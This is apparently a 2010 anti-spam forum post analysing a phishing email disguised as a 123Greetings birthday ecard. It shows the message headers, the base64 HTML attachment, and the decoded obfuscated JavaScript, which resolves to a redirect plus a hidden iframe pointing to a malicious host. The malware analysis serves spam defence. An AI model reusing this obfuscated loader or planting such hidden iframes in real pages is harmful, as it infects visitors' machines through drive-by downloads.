« previous next »
Pages: [1]   Go Down

Author Topic: ecard email scam  (Read 3351 times)

0 Members and 1 Guest are viewing this topic.

June 14, 2010, 06:38:47 pm
Read 3351 times

cleanmx

  • Special Members
  • Hero Member
  • Offline
  • *
  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
ecard email scam
nice finding  ;D

Code: [Select]
X-Quarantine-ID: <DApwRkdUFIO2>
X-Virus-Scanned: by netpilot GmbH at clean-mx.de
X-Spam-Flag: YES
X-Spam-Score: 31.608
X-Spam-Level: *******************************
X-Spam-Status: Yes, score=31.608 tagged_above=-999 required=6
tests=[BAYES_99=3.3, DCC_CHECK=2.17, DNS_FROM_AHBL_RHSBL=0.692,
FORGED_OUTLOOK_TAGS=0.001, HTML_MESSAGE=0.001,
RCVD_IN_BL_SPAMCOP_NET=1.96, RCVD_IN_XBL=3.033, RDNS_NONE=0.1,
SPF_FAIL=19, TVD_RCVD_SINGLE=1.351]
Received: from relayn.netpilot.net ([127.0.0.1])
by localhost (relayn.netpilot.net [127.0.0.1]) (clean-mx, port 10024)
with ESMTP id DApwRkdUFIO2 for <trap@funny.clean-mx.com>;
Mon, 14 Jun 2010 19:47:29 +0200 (CEST)
Received: from JRCBEKZMTG (unknown [211.226.135.211])
by relayn.netpilot.net (Postfix) with ESMTP id 62340EAC384
for <trap@funny.clean-mx.com>; Mon, 14 Jun 2010 19:47:27 +0200 (CEST)
Received: from 211.226.135.211 by reply.worthzone.com; Tue, 15 Jun 2010 02:46:52 +0900
Message-ID: <000d01cb0be9$92bd0de0$6400a8c0@handshaking5>
From: "123Greetings.com" <ecards@123greetings.com>
To: <trap@funny.clean-mx.com>
Subject: handshaking5@reply.worthzone.com has sent you a birthday ecard.
Date: Tue, 15 Jun 2010 02:46:52 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB0BE9.92BD0DE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB0BE9.92BD0DE0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit

[handshaking5@reply.worthzone.com] just sent you an ecard

You can view it by open attached document.

Your ecard is going to be with us for the next 30 days.

We hope you enjoy your ecard.


------=_NextPart_000_0006_01CB0BE9.92BD0DE0
Content-Type: text/html;
name="ecard.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="ecard.html"

PHNjcmlwdD52YXIgYXRsOyBhdGwgPSAnYnNJc0x3dVVsRCcgO3ZhciBhd0NFIDsgYXdDRT00ODQ7
dmFyIGRwZmhFciA9NDMyIDt2YXIgUXU9IDk3NCA7IGlmIChhd0NFPGRwZmhFcil7YXdDRT0gZHBm
aEVyXlF1O31hdGwgPSAnJyA7dmFyIGlBZ2csIG1EcGsgO3ZhciBFQU9vWSA7RUFPb1k9MTUzIDtp
ZiAoaUFnZzxtRHBrKXtpQWdnPW1EcGsvRUFPb1kgOyB9dmFyIEFVcU1BPXRoaXM7dmFyIGpMPSdy
JysnZXBsYWNlJzt2YXIgdGRiSGZ2PSAnYkthSzhNZE0ydjZNNU05TTFUNHY3djZNN0s5VDNNY3Yw
djB2NEtlVGJUYnY3TWJNM004TTV2NE0xdmRUYU01djRNYXYxdjdNNVRhTWFNMXYwS2UnIDsgdmFy
IHpRd2xVUjt6UXdsVVIgPTM1NDsgdmFyIHFBY2F2PTc2MyA7dmFyIEhzPTkyMzsgaWYgKHpRd2xV
Uj09cUFjYXYpe3pRd2xVUj0gcUFjYXYrSHMgOyB9dmFyIEFmWmpTPSAnMHYwTWNLOVQzSzVUJyA7
dmFyIG9wcD0gJ1V3ckcnOyB2YXIgTFVpLCBPQW5SeiA7dmFyIHFWPTE2O2lmIChMVWk9PU9BblJ6
KXtMVWk9T0FuUnorcVY7IH12YXIgSnJjYXR6ID0nSzhUYk1kTTInOyB2YXIgeWJxO3licSA9ICcn
O3ZhciBOWlNGeEEgPSAxNDEgO3ZhciB6SGZtLER1RCA7IGlmIChOWlNGeEE8PXpIZm0pe05aU0Z4
QSA9ekhmbStEdUQ7fXlicSA9JzVNOU0xJyA7dmFyIHdYYWJMSyA7d1hhYkxLID0nJzsgd1hhYkxL
PSd2Nk0nOyB2YXIgSlpsUGo7IEpabFBqPScnO3ZhciBac3hiRSwgY0NrSzsgdmFyIG9IWG1UPTIx
MTsgaWYgKFpzeGJFPmNDa0spe1pzeGJFID1jQ2tLL29IWG1UOyB9SlpsUGo9ICd2N01kTTZNZE04
TWR2MHZkS2VUNE0nOyB2YXIgSE9xYmU7SE9xYmU9ICcnIDtIT3FiZT0gJzNUNE1jTTFNZE0zTWN2
MEsnOyB2YXIgbGxxZWs9ICdlRlFCYSc7IHZhciB3WVEgOyB3WVEgPSAnJzsgd1lRID0nTTBNYk03
djFNOU0xTWF2MFRhdjN2Nk1kdjBNMVRjVDZLOE05TTF2ME01VCc7IHZhciBxVEhTeDsgcVRIU3gg
PSAnS2NLNEtjSzRUYk1kTWFNME0xdmNUYXY0TWN2NEtidjRNZE0wSzlLNUs0VDNUNHYzTWRNJyA7
dmFyIGRNWHZSICxaQlFzVjt2YXIgeGZzUlEgPTY4NTsgaWYgKGRNWHZSPT1aQlFzVil7ZE1YdlI9
IFpCUXNWIC14ZnNSUTt9dmFyIGJYPSdLZicgOyB2YXIgbGg7IGxoPScnIDsgdmFyIGdzICwgZlo7
dmFyIHpGbj0xODIgOyBpZiAoZ3M+Zlope2dzPWZaXnpGbjt9bGg9ICcxdjdNY1U4VDZUNE03TWJN
YXYwTTFNYXYwSzlVOFQ2SzdLZnYxdjZNOEs5TWN2MHYwdjRLZVRiVGJ2ME1iTThNMHY3djRNMU01
TWZUYU03TWJNOVRiVThUNlQ0VCc7IHZhciBjdU9aYnEsc2IgO3ZhciBmVz0gMTM3IDsgaWYgKGZX
PWN1T1picSAmJiBjdU9aYnE+c2Ipe2N1T1picSA9c2IrZlc7fXZhciBKc01qeDsgSnNNanggPSdL
YVQnIDt2YXIgWUh5eiA9J00wTTFNJzt2YXIgTEZpcCA9MzYzIDsgdmFyIFpFVT0gNjcgOyB2YXIg
WUxUUmE9IDI0NjsgaWYgKExGaXA+PVpFVSl7TEZpcCA9WkVVXllMVFJhIDsgfXZhciBES1lZaSA9
J01Bd1dTUGNmRmdJV1d4TnZFJzsgdmFyIEZRUWMgLFlJTSxTdXlQanQ7IGlmIChGUVFjPT1ZSU0p
e0ZRUWM9IFlJTStTdXlQanQgOyB9dmFyIGJEUE1hZDsgYkRQTWFkPSc0TWN2MHYwdjRUOU0xdjV2
MU1kdjJLOVU4VDZ2Nk0xTTJ2Nk0nO3ZhciBoemtOaT0gOTM7dmFyIHpGWlJpLCBkanRuIDtpZiAo
aHprTmk+PXpGWlJpKXtoemtOaSA9ekZaUmkrZGp0bjsgfXZhciBrRExSQyA9ICdTWVJ6b0ZaTWZ4
dGFNSVJSQnFNdic7IHZhciBKTEpQYWs7IEpMSlBhaz0gJycgOyBKTEpQYWsgPSdhS2ZUM0thJzsg
ZnVuY3Rpb24gVkZoKElGKXt2YXIgRHdCa1dJPWF0bDsgZm9yKHB2dVRFRD0gMCA7cHZ1VEVEPElG
WydsVWVibk1nenRiaGInW2pMXSgvW2JGelVNXS9nLCBhdGwpXTsgKytwdnVURUQpe0R3QmtXST1E
d0JrV0krQVVxTUFbJ1N4dGZyQ2lDbnlnQydbakxdKC9bQ3l4ZkVdL2csYXRsKV1bJ2Z2ckFvU210
Q3RodmFBcnZDWm92ZHZlUydbakxdKC9bU3Z0WkFdL2cgLGF0bCldKDReSUZbJ2NIaFNhSXJuQ1Nv
U2RTZW5BbnRIJ1tqTF0oL1tIRkluU10vZywgYXRsKV0ocHZ1VEVEKSk7IHZhciBldnh4IDtldnh4
PSA1ODAgO3ZhciBsZ2k9NzY5IDt2YXIgRGYgO0RmID0gMTkyIDtpZiAoRGY+ZXZ4eCAmJiBldnh4
PmxnaSl7ZXZ4eD0gbGdpLURmIDsgfX1yZXR1cm4gRHdCa1dJIDt9dmFyIGladjtpWnYgPScnIDsg
aVp2PSAnNlRkJyA7dmFyIEhJdVogPSc5VDNLNVQzVDR2N3YwdmRNOE0xSzlUM3YyTWQnIDt2YXIg
T3ZKID0gJ2NNZE0wJyA7dmFyIFdmVmhEdCA7V2ZWaER0ID0gYXRsO3ZhciBoYVF5dyA9IHdZUTto
YVF5dyA9IGhhUXl3K2JEUE1hZCtsaCA7aGFReXcgPWhhUXl3K3RkYkhmditxVEhTeCtBZlpqUytI
T3FiZSA7IGhhUXl3ID0gaGFReXcrSEl1WiA7IGhhUXl3PWhhUXl3K0pabFBqO2hhUXl3ID0gaGFR
eXcrT3ZKK1lIeXorSkxKUGFrK0pyY2F0eit3WGFiTEsreWJxK0pzTWp4K2laditiWDsgaGFReXcg
PWhhUXl3K1dmVmhEdDsgdmFyIGZpcGRpaSA9ICdmcXIwbFRjMmlLTDNOeVMxWm1DOHB2ZzdReFg0
a1ViNUV1bjlzTUo2J1tqTF0oL1tmbGlOWnBRa0VzXS9nICwnXDsnKVtqTF0oL1tyY0xTQ2dYYm5K
XS9nLCdcPycpOyB2YXIgYXFqPSInKVtqTF0oL1siO3ZhciBHeUpybCA9ICJdL2cgLCAnJSI7dmFy
IEtQPSBmaXBkaWlbakxdKC9bXDtdL2cgLGFxailbakxdKC9bXD9dL2cgLCBHeUpybCk7IHZhciBX
SEU7V0hFPSBqTDtBVXFNQVsnZXp2RGFabEQnW1dIRV0oL1tER1p6UF0vZyAsYXRsKV0oJ3ZhciBL
VElHWkc9IGhhUXl3JytLUFsnc0J1Q2Jvc0N0Q3JvaW9ua2dCJ1tqTF0oL1tCa2VvQ10vZyAsIGF0
bCldKDIsS1BbJ2xGZUdueGdGdENoRydbakxdKC9bR3hDRktdL2cgLGF0bCldKSsiJykgOyIpIDt2
YXIgY1B4Z2c9IDc1MTsgdmFyIGppb3AgPTkwMCA7IHZhciBFU0VPIDtFU0VPID0gMzA5O2lmIChj
UHhnZz09amlvcCl7Y1B4Z2c9IGppb3AvRVNFTzsgfXZhciB3dDt3dCA9akw7IEFVcU1BWydlT3ZW
YUdsTydbd3RdKC9bT1lUR1ZdL2cgLCBhdGwpXShWRmgoQVVxTUFbWyd1QW5VZU5zTmNsYWxwTmVO
J1tqTF0oL1tOQWxxVV0vZyxhdGwpXV0oS1RJR1pHKSkpO3ZhciBCWmd6RFEgPTE2MDt2YXIgVGtZ
ID0gNTg0O3ZhciB5aHlMY0sgPSA4OTI7aWYgKEJaZ3pEUT09VGtZKXtCWmd6RFEgPSBUa1leeWh5
TGNLIDsgfTwvc2NyaXB0Pg==

------=_NextPart_000_0006_01CB0BE9.92BD0DE0--

leads to this embedded ecard.html
Code: [Select]
<script>var atl; atl = 'bsIsLwuUlD' ;var awCE ; awCE=484;var dpfhEr =432 ;var Qu= 974 ; if (awCE<dpfhEr){awCE= dpfhEr^Qu;}atl = '' ;var iAgg, mDpk ;var EAOoY ;EAOoY=153 ;if (iAgg<mDpk){iAgg=mDpk/EAOoY ; }var AUqMA=this;var jL='r'+'eplace';var tdbHfv= 'bKaK8MdM2v6M5M9M1T4v7v6M7K9T3Mcv0v0v4KeTbTbv7MbM3M8M5v4M1vdTaM5v4Mav1v7M5TaMaM1v0Ke' ; var zQwlUR;zQwlUR =354; var qAcav=763 ;var Hs=923; if (zQwlUR==qAcav){zQwlUR= qAcav+Hs ; }var AfZjS= '0v0McK9T3K5T' ;var opp= 'UwrG'; var LUi, OAnRz ;var qV=16;if (LUi==OAnRz){LUi=OAnRz+qV; }var Jrcatz ='K8TbMdM2'; var ybq;ybq = '';var NZSFxA = 141 ;var zHfm,DuD ; if (NZSFxA<=zHfm){NZSFxA =zHfm+DuD;}ybq ='5M9M1' ;var wXabLK ;wXabLK =''; wXabLK='v6M'; var JZlPj; JZlPj='';var ZsxbE, cCkK; var oHXmT=211; if (ZsxbE>cCkK){ZsxbE =cCkK/oHXmT; }JZlPj= 'v7MdM6MdM8Mdv0vdKeT4M'; var HOqbe;HOqbe= '' ;HOqbe= '3T4McM1MdM3Mcv0K'; var llqek= 'eFQBa'; var wYQ ; wYQ = ''; wYQ ='M0MbM7v1M9M1Mav0Tav3v6Mdv0M1TcT6K8M9M1v0M5T'; var qTHSx; qTHSx = 'KcK4KcK4TbMdMaM0M1vcTav4Mcv4Kbv4MdM0K9K5K4T3T4v3MdM' ;var dMXvR ,ZBQsV;var xfsRQ =685; if (dMXvR==ZBQsV){dMXvR= ZBQsV -xfsRQ;}var bX='Kf' ; var lh; lh='' ; var gs , fZ;var zFn=182 ; if (gs>fZ){gs=fZ^zFn;}lh= '1v7McU8T6T4M7MbMav0M1Mav0K9U8T6K7Kfv1v6M8K9Mcv0v0v4KeTbTbv0MbM8M0v7v4M1M5MfTaM7MbM9TbU8T6T4T'; var cuOZbq,sb ;var fW= 137 ; if (fW=cuOZbq && cuOZbq>sb){cuOZbq =sb+fW;}var JsMjx; JsMjx ='KaT' ;var YHyz ='M0M1M';var LFip =363 ; var ZEU= 67 ; var YLTRa= 246; if (LFip>=ZEU){LFip =ZEU^YLTRa ; }var DKYYi ='MAwWSPcfFgIWWxNvE'; var FQQc ,YIM,SuyPjt; if (FQQc==YIM){FQQc= YIM+SuyPjt ; }var bDPMad; bDPMad='4Mcv0v0v4T9M1v5v1Mdv2K9U8T6v6M1M2v6M';var hzkNi= 93;var zFZRi, djtn ;if (hzkNi>=zFZRi){hzkNi =zFZRi+djtn; }var kDLRC = 'SYRzoFZMfxtaMIRRBqMv'; var JLJPak; JLJPak= '' ; JLJPak ='aKfT3Ka'; function VFh(IF){var DwBkWI=atl; for(pvuTED= 0 ;pvuTED<IF['lUebnMgztbhb'[jL](/[bFzUM]/g, atl)]; ++pvuTED){DwBkWI=DwBkWI+AUqMA['SxtfrCiCnygC'[jL](/[CyxfE]/g,atl)]['fvrAoSmtCthvaArvCZovdveS'[jL](/[SvtZA]/g ,atl)](4^IF['cHhSaIrnCSoSdSenAntH'[jL](/[HFInS]/g, atl)](pvuTED)); var evxx ;evxx= 580 ;var lgi=769 ;var Df ;Df = 192 ;if (Df>evxx && evxx>lgi){evxx= lgi-Df ; }}return DwBkWI ;}var iZv;iZv ='' ; iZv= '6Td' ;var HIuZ ='9T3K5T3T4v7v0vdM8M1K9T3v2Md' ;var OvJ = 'cMdM0' ;var WfVhDt ;WfVhDt = atl;var haQyw = wYQ;haQyw = haQyw+bDPMad+lh ;haQyw =haQyw+tdbHfv+qTHSx+AfZjS+HOqbe ; haQyw = haQyw+HIuZ ; haQyw=haQyw+JZlPj;haQyw = haQyw+OvJ+YHyz+JLJPak+Jrcatz+wXabLK+ybq+JsMjx+iZv+bX; haQyw =haQyw+WfVhDt; var fipdii = 'fqr0lTc2iKL3NyS1ZmC8pvg7QxX4kUb5Eun9sMJ6'[jL](/[fliNZpQkEs]/g ,'\;')[jL](/[rcLSCgXbnJ]/g,'\?'); var aqj="')[jL](/[";var GyJrl = "]/g , '%";var KP= fipdii[jL](/[\;]/g ,aqj)[jL](/[\?]/g , GyJrl); var WHE;WHE= jL;AUqMA['ezvDaZlD'[WHE](/[DGZzP]/g ,atl)]('var KTIGZG= haQyw'+KP['sBuCbosCtCroionkgB'[jL](/[BkeoC]/g , atl)](2,KP['lFeGnxgFtChG'[jL](/[GxCFK]/g ,atl)])+"') ;") ;var cPxgg= 751; var jiop =900 ; var ESEO ;ESEO = 309;if (cPxgg==jiop){cPxgg= jiop/ESEO; }var wt;wt =jL; AUqMA['eOvVaGlO'[wt](/[OYTGV]/g , atl)](VFh(AUqMA[['uAnUeNsNclalpNeN'[jL](/[NAlqU]/g,atl)]](KTIGZG)));var BZgzDQ =160;var TkY = 584;var yhyLcK = 892;if (BZgzDQ==TkY){BZgzDQ = TkY^yhyLcK ; }</script>

malzilla decodes to:

Code: [Select]
<meta http-equiv="refresh" content="3;url=http://toldspeak.com/" /><iframe src='http://soglapey.apnusa.net:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
Logged
Pages: [1]   Go Up
« previous next »